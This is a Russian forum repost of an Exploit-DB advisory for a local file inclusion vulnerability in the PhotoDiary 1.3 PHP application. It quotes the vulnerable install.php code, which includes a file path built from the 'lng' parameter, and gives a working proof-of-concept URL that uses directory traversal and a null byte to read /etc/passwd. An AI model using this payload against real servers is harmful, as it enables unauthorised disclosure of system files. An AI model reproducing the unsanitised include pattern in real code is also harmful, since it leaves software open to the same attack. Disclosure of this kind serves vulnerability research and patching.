- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10869
- Проверка EDB
-
- Пройдено
- Автор
- CONDEMNED
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-31
Код:
PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned
download: http://code.google.com/p/photodiary/
source of /admin/install.php (lines 9 - 15):
if (isset($_GET['lng'])){
$LNG = $_GET['lng']; # 1
} else {
$LNG = "ITA";
}
include "../common/language_".$LNG.".php"; # 2
proof of concept:
http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00- Источник
- www.exploit-db.com
